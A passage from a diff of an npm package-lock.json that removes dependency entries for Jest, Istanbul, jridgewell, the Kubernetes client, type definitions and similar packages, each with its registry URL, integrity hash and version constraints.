"sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "dependencies": { - "sprintf-js": "~1.0.2" - } - }, - "node_modules/@istanbuljs/load-nyc-config/node_modules/find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "dependencies": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/@istanbuljs/load-nyc-config/node_modules/js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, - "dependencies": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - }, - "bin": { - "js-yaml": "bin/js-yaml.js" - } - }, - "node_modules/@istanbuljs/load-nyc-config/node_modules/locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "dependencies": { - "p-locate": "^4.1.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/@istanbuljs/load-nyc-config/node_modules/p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "dependencies": { - "p-try": "^2.0.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/@istanbuljs/load-nyc-config/node_modules/p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "dependencies": { - "p-limit": "^2.2.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/@istanbuljs/load-nyc-config/node_modules/resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/@jest/console": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.7.0.tgz", - "integrity": "sha512-5Ni4CU7XHQi32IJ398EEP4RrB8eV09sXP2ROqD4bksHrnTree52PsxvX8tpL8LvTZ3pFzXyPbNQReSN41CAhOg==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/core": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.7.0.tgz", - "integrity": "sha512-n7aeXWKMnGtDA48y8TLWJPJmLmmZ642Ceo78cYWEpiD7FzDgmNDV/GCVRorPABdXLJZ/9wzzgZAlHjXjxDHGsg==", - "dev": true, - "dependencies": { - "@jest/console": "^29.7.0", - "@jest/reporters": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.7.0", - "jest-config": "^29.7.0", - "jest-haste-map": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-resolve-dependencies": "^29.7.0", - "jest-runner": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "jest-watcher": "^29.7.0", - "micromatch": "^4.0.4", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/@jest/environment": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.7.0.tgz", - "integrity": "sha512-aQIfHDq33ExsN4jP1NWGXhxgQ/wixs60gDiKO+XVMd8Mn0NWPWgc34ZQDTb2jKaUWQ7MuwoitXAsN2XVXNMpAw==", - "dev": true, - "dependencies": { - "@jest/fake-timers": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-mock": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/expect": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.7.0.tgz", - "integrity": "sha512-8uMeAMycttpva3P1lBHB8VciS9V0XAr3GymPpipdyQXbBcuhkLQOSe8E/p92RyAdToS6ZD1tFkX+CkhoECE0dQ==", - "dev": true, - "dependencies": { - "expect": "^29.7.0", - "jest-snapshot": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/expect-utils": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.7.0.tgz", - "integrity": "sha512-GlsNBWiFQFCVi9QVSx7f5AgMeLxe9YCCs5PuP2O2LdjDAA8Jh9eX7lA1Jq/xdXw3Wb3hyvlFNfZIfcRetSzYcA==", - "dev": true, - "dependencies": { - "jest-get-type": "^29.6.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/fake-timers": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.7.0.tgz", - "integrity": "sha512-q4DH1Ha4TTFPdxLsqDXK1d3+ioSL7yL5oCMJZgDYm6i+6CygW5E5xVr/D1HdsGxjt1ZWSfUAs9OxSB/BNelWrQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.7.0", - "jest-mock": "^29.7.0", - "jest-util": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/globals": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.7.0.tgz", - "integrity": "sha512-mpiz3dutLbkW2MNFubUGUEVLkTGiqW6yLVTA+JbP6fI6J5iL9Y0Nlg8k95pcF8ctKwCS7WVxteBs29hhfAotzQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.7.0", - "@jest/expect": "^29.7.0", - "@jest/types": "^29.6.3", - "jest-mock": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/reporters": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.7.0.tgz", - "integrity": "sha512-DApq0KJbJOEzAFYjHADNNxAE3KbhxQB1y5Kplb5Waqw6zVbuWatSnMjE5gs8FUgEPmNsnZA3NCWl9NG0ia04Pg==", - "dev": true, - "dependencies": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@jridgewell/trace-mapping": "^0.3.18", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^6.0.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "jest-worker": "^29.7.0", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/@jest/schemas": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.3.tgz", - "integrity": "sha512-mo5j5X+jIZmJQveBKeS/clAueipV7KgiX1vMgCxam1RNYiqE1w62n0/tJJnHtjW8ZHcQco5gY85jA3mi0L+nSA==", - "dev": true, - "dependencies": { - "@sinclair/typebox": "^0.27.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/source-map": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.6.3.tgz", - "integrity": "sha512-MHjT95QuipcPrpLM+8JMSzFx6eHp5Bm+4XeFDJlwsvVBjmKNiIAvasGK2fxz2WbGRlnvqehFbh07MMa7n3YJnw==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.18", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/test-result": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.7.0.tgz", - "integrity": "sha512-Fdx+tv6x1zlkJPcWXmMDAG2HBnaR9XPSd5aDWQVsfrZmLVT3lU1cwyxLgRmXR9yrq4NBoEm9BMsfgFzTQAbJYA==", - "dev": true, - "dependencies": { - "@jest/console": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/test-sequencer": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.7.0.tgz", - "integrity": "sha512-GQwJ5WZVrKnOJuiYiAF52UNUJXgTZx1NHjFSEB0qEMmSZKAkdMoIzw/Cj6x6NF4AvV23AUqDpFzQkN/eYCYTxw==", - "dev": true, - "dependencies": { - "@jest/test-result": "^29.7.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/transform": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.7.0.tgz", - "integrity": "sha512-ok/BTPFzFKVMwO5eOHRrvnBVHdRy9IrsrW1GpMaQ9MCnilNLXQKmAX8s1YXDFaai9xJpac2ySzV0YeRRECr2Vw==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.6.3", - "@jridgewell/trace-mapping": "^0.3.18", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-util": "^29.7.0", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.2" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/types": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.3.tgz", - "integrity": "sha512-u3UPsIilWKOM3F9CXtrG8LEJmNxwoCQC/XVj4IKYXvvpx7QIi/Kg1LI5uDmDpKlac62NUtX7eLjRh+jVZcLOzw==", - "dev": true, - "dependencies": { - "@jest/schemas": "^29.6.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jridgewell/gen-mapping": { - "version": "0.3.5", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.5.tgz", - "integrity": "sha512-IzL8ZoEDIBRWEzlCcRhOaCupYyN5gdIK+Q6fbFdPDg6HqX6jpkItn7DFIpW9LQzXG6Df9sA7+OKnq0qlz/GaQg==", - "dev": true, - "dependencies": { - "@jridgewell/set-array": "^1.2.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.24" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/resolve-uri": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.2.tgz", - "integrity": "sha512-bRISgCIjP20/tbWSPWMEi54QVPRZExkuD9lJL+UIxUKtwVJA8wW1Trb1jMs1RFXo1CBTNZ/5hpC9QvmKWdopKw==", - "dev": true, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/set-array": { - "version": "1.2.1", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.2.1.tgz", - "integrity": "sha512-R8gLRTZeyp03ymzP/6Lil/28tGeGEzhx1q2k703KGWRAI1VdvPIXdG70VJc2pAMw3NA6JKL5hhFu1sJX0Mnn/A==", - "dev": true, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/sourcemap-codec": { - "version": "1.5.0", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.5.0.tgz", - "integrity": "sha512-gv3ZRaISU3fjPAgNsriBRqGWQL6quFx04YMPW/zD8XMLsU32mhCCbfbO6KZFLjvYpCZ8zyDEgqsgf+PwPaM7GQ==", - "dev": true - }, - "node_modules/@jridgewell/trace-mapping": { - "version": "0.3.25", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.25.tgz", - "integrity": "sha512-vNk6aEwybGtawWmy/PzwnGDOjCkLWSD2wqvjGGAgOAwCGWySYXfYoxt00IJkTF+8Lb57DwOb3Aa0o9CApepiYQ==", - "dev": true, - "dependencies": { - "@jridgewell/resolve-uri": "^3.1.0", - "@jridgewell/sourcemap-codec": "^1.4.14" - } - }, - "node_modules/@jsep-plugin/assignment": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/@jsep-plugin/assignment/-/assignment-1.3.0.tgz", - "integrity": "sha512-VVgV+CXrhbMI3aSusQyclHkenWSAm95WaiKrMxRFam3JSUiIaQjoMIw2sEs/OX4XifnqeQUN4DYbJjlA8EfktQ==", - "engines": { - "node": ">= 10.16.0" - }, - "peerDependencies": { - "jsep": "^0.4.0||^1.0.0" - } - }, - "node_modules/@jsep-plugin/regex": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/@jsep-plugin/regex/-/regex-1.0.4.tgz", - "integrity": "sha512-q7qL4Mgjs1vByCaTnDFcBnV9HS7GVPJX5vyVoCgZHNSC9rjwIlmbXG5sUuorR5ndfHAIlJ8pVStxvjXHbNvtUg==", - "engines": { - "node": ">= 10.16.0" - }, - "peerDependencies": { - "jsep": "^0.4.0||^1.0.0" - } - }, - "node_modules/@kubernetes/client-node": { - "version": "0.22.3", - "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-0.22.3.tgz", - "integrity": "sha512-dG8uah3+HDJLpJEESshLRZlAZ4PgDeV9mZXT0u1g7oy4KMRzdZ7n5g0JEIlL6QhK51/2ztcIqURAnjfjJt6Z+g==", - "dependencies": { - "byline": "^5.0.0", - "isomorphic-ws": "^5.0.0", - "js-yaml": "^4.1.0", - "jsonpath-plus": "^10.2.0", - "request": "^2.88.0", - "rfc4648": "^1.3.0", - "stream-buffers": "^3.0.2", - "tar": "^7.0.0", - "tslib": "^2.4.1", - "ws": "^8.18.0" - }, - "optionalDependencies": { - "openid-client": "^6.1.3" - } - }, - "node_modules/@nodelib/fs.scandir": { - "version": "2.1.5", - "resolved": "https://registry.npmjs.org/@nodelib/fs.scandir/-/fs.scandir-2.1.5.tgz", - "integrity": "sha512-vq24Bq3ym5HEQm2NKCr3yXDwjc7vTsEThRDnkp2DK9p1uqLR+DHurm/NOTo0KG7HYHU7eppKZj3MyqYuMBf62g==", - "dev": true, - "peer": true, - "dependencies": { - "@nodelib/fs.stat": "2.0.5", - "run-parallel": "^1.1.9" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/@nodelib/fs.stat": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/@nodelib/fs.stat/-/fs.stat-2.0.5.tgz", - "integrity": "sha512-RkhPPp2zrqDAQA/2jNhnztcPAlv64XdhIp7a7454A5ovI7Bukxgt7MX7udwAu3zg1DcpPU0rz3VV1SeaqvY4+A==", - "dev": true, - "peer": true, - "engines": { - "node": ">= 8" - } - }, - "node_modules/@nodelib/fs.walk": { - "version": "1.2.8", - "resolved": "https://registry.npmjs.org/@nodelib/fs.walk/-/fs.walk-1.2.8.tgz", - "integrity": "sha512-oGB+UxlgWcgQkgwo8GcEGwemoTFt3FIO9ababBmaGwXIoBKZ+GTy0pP185beGg7Llih/NSHSV2XAs1lnznocSg==", - "dev": true, - "peer": true, - "dependencies": { - "@nodelib/fs.scandir": "2.1.5", - "fastq": "^1.6.0" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/@pkgjs/parseargs": { - "version": "0.11.0", - "resolved": "https://registry.npmjs.org/@pkgjs/parseargs/-/parseargs-0.11.0.tgz", - "integrity": "sha512-+1VkjdD0QBLPodGrJUeqarH8VAIvQODIbwh9XpP5Syisf7YoQgsJKPNFoqqLQlu+VQ/tVSshMR6loPMn8U+dPg==", - "optional": true, - "engines": { - "node": ">=14" - } - }, - "node_modules/@sinclair/typebox": { - "version": "0.27.8", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", - "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", - "dev": true - }, - "node_modules/@sinonjs/commons": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.1.tgz", - "integrity": "sha512-K3mCHKQ9sVh8o1C9cxkwxaOmXoAMlDxC1mYyHrjqOWEcBjYr76t96zL2zlj5dUGZ3HSw240X1qgH3Mjf1yJWpQ==", - "dev": true, - "dependencies": { - "type-detect": "4.0.8" - } - }, - "node_modules/@sinonjs/fake-timers": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.3.0.tgz", - "integrity": "sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==", - "dev": true, - "dependencies": { - "@sinonjs/commons": "^3.0.0" - } - }, - "node_modules/@types/babel__core": { - "version": "7.20.5", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.5.tgz", - "integrity": "sha512-qoQprZvz5wQFJwMDqeseRXWv3rqMvhgpbXFfVyWhbx9X47POIA6i/+dXefEmZKoAgOaTdaIgNSMqMIU61yRyzA==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.20.7", - "@babel/types": "^7.20.7", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "node_modules/@types/babel__generator": { - "version": "7.6.8", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.8.tgz", - "integrity": "sha512-ASsj+tpEDsEiFr1arWrlN6V3mdfjRMZt6LtK/Vp/kreFLnr5QH5+DhvD5nINYZXzwJvXeGq+05iUXcAzVrqWtw==", - "dev": true, - "dependencies": { - "@babel/types": "^7.0.0" - } - }, - "node_modules/@types/babel__template": { - "version": "7.4.4", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.4.tgz", - "integrity": "sha512-h/NUaSyG5EyxBIp8YRxo4RMe2/qQgvyowRwVMzhYhBCONbW8PUsg4lkFMrhgZhUe5z3L3MiLDuvyJ/CaPa2A8A==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" - } - }, - "node_modules/@types/babel__traverse": { - "version": "7.20.6", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.6.tgz", - "integrity": "sha512-r1bzfrm0tomOI8g1SzvCaQHo6Lcv6zu0EA+W2kHrt8dyrHQxGzBBL4kdkzIS+jBMV+EYcMAEAqXqYaLJq5rOZg==", - "dev": true, - "dependencies": { - "@babel/types": "^7.20.7" - } - }, - "node_modules/@types/graceful-fs": { - "version": "4.1.9", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.9.tgz", - "integrity": "sha512-olP3sd1qOEe5dXTSaFvQG+02VdRXcdytWLAZsAq1PecU8uqQAhkrnbli7DagjtXKW/Bl7YJbUsa8MPcuc8LHEQ==", - "dev": true, - "dependencies": { - "@types/node": "*" - } - }, - "node_modules/@types/istanbul-lib-coverage": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.6.tgz", - "integrity": "sha512-2QF/t/auWm0lsy8XtKVPG19v3sSOQlJe/YHZgfjb/KBBHOGSV+J2q/S671rcq9uTBrLAXmZpqJiaQbMT+zNU1w==", - "dev": true - }, - "node_modules/@types/istanbul-lib-report": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.3.tgz", - "integrity": "sha512-NQn7AHQnk/RSLOxrBbGyJM/aVQ+pjj5HCgasFxc0K/KhoATfQ/47AyUl15I2yBUpihjmas+a+VJBOqecrFH+uA==", - "dev": true, - "dependencies": { - "@types/istanbul-lib-coverage": "*" - } - }, - "node_modules/@types/istanbul-reports": { - "version": "3.0.4", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.4.tgz", - "integrity": "sha512-pk2B1NWalF9toCRu6gjBzR69syFjP4Od8WRAX+0mmf9lAjCRicLOWc+ZrxZHx/0XRjotgkF9t6iaMJ+aXcOdZQ==", - "dev": true, - "dependencies": { - "@types/istanbul-lib-report": "*" - } - }, - "node_modules/@types/node": { - "version": "22.10.1", - "resolved": "https://registry.npmjs.org/@types/node/-/node-22.10.1.tgz", - "integrity": "sha512-qKgsUwfHZV2WCWLAnVP1JqnpE6Im6h3Y0+fYgMTasNQ7V++CBX5OT1as0g0f+OyubbFqhf6XVNIsmN4IIhEgGQ==", - "dev": true, - "dependencies": { - "undici-types": "~6.20.0" - } - }, - "node_modules/@types/parse-json": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/@types/parse-json/-/parse-json-4.0.2.tgz", - "integrity": "sha512-dISoDXWWQwUquiKsyZ4Ng+HX2KsPL7LyHKHQwgGFEA3IaKac4Obd+h2a/a6waisAoepJlBcx9paWqjA8/HVjCw==", - "dev": true - }, - "node_modules/@types/prettier": { - "version": "2.7.3", - "resolved": "https://registry.npmjs.org/@types/prettier/-/prettier-2.7.3.tgz", - "integrity": "sha512-+68kP9yzs4LMp7VNh8gdzMSPZFL44MLGqiHWvttYJe+6qnuVr4Ek9wSBQoveqY/r+LwjCcU29kNVkidwim+kYA==", - "dev": true, - "optional": true, - "peer": true - }, - "node_modules/@types/stack-utils": { - "version": "2.0.3", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.3.tgz", - "integrity": "sha512-9aEbYZ3TbYMznPdcdr3SmIrLXwC/AKZXQeCf9Pgao5CKb8CyHuEX5jzWPTkvregvhRJHcpRO6BFoGW9ycaOkYw==", - "dev": true - }, - "node_modules/@types/yargs": { - "version": "17.0.33", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.33.tgz", - "integrity": "sha512-WpxBCKWPLr4xSsHgz511rFJAM+wS28w2zEO1QDNY5zM/S8ok70NNfztH0xwhqKyaK0OHCbN98LDAZuy1ctxDkA==", - "dev": true, - "dependencies": { - "@types/yargs-parser": "*" - } - }, - "node_modules/@types/yargs-parser": { - "version": "21.0.3", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.3.tgz", - "integrity": "sha512-I4q9QU9MQv4oEOz4tAHJtNz1cwuLxn2F3xcc2iV5WdqLPpUnj30aUuxt1mAxYTG+oe8CZMV/+6rU4S4gRDzqtQ==", - "dev": true - }, - "node_modules/acorn": { - "version": "8.9.0", - "resolved": "https://registry.npmjs.org/acorn/-/acorn-8.9.0.tgz", - "integrity": "sha512-jaVNAFBHNLXspO543WnNNPZFRtavh3skAkITqD0/2aeMkKZTN+254PyhwxFYrk3vQ1xfY+2wbesJMs/JC8/PwQ==", - "dev": true, - "peer": true, - "bin": { - "acorn": "bin/acorn" - }, - "engines": { - "node": ">=0.4.0" - } - }, - "node_modules/acorn-jsx": { - "version": "5.3.2", - "resolved": "https://registry.npmjs.org/acorn-jsx/-/acorn-jsx-5.3.2.tgz", - "integrity": "sha512-rq9s+JNhf0IChjtDXxllJ7g41oZk5SlXtp0LHwyA5cejwn7vKmKp4pPri6YEePv2PU65sAsegbXtIinmDFDXgQ==", - "dev": true, - "peer": true, - "peerDependencies": { - "acorn": "^6.0.0 || ^7.0.0 || ^8.0.0" - } - }, - "node_modules/ajv": { - "version": "6.12.6", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", - "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", - "dependencies": { - "fast-deep-equal": "^3.1.1", - "fast-json-stable-stringify": "^2.0.0", - "json-schema-traverse": "^0.4.1", - "uri-js": "^4.2.2" - }, - "funding": { - "type": "github", - "url": "https://github.com/sponsors/epoberezkin" - } - }, - "node_modules/ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", - "dev": true, - "dependencies": { - "type-fest": "^0.21.3" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/ansi-escapes/node_modules/type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "engines": { - "node": ">=8" - } - }, - "node_modules/ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "dependencies": { - "color-convert": "^2.0.1" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/anymatch": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", - "integrity": 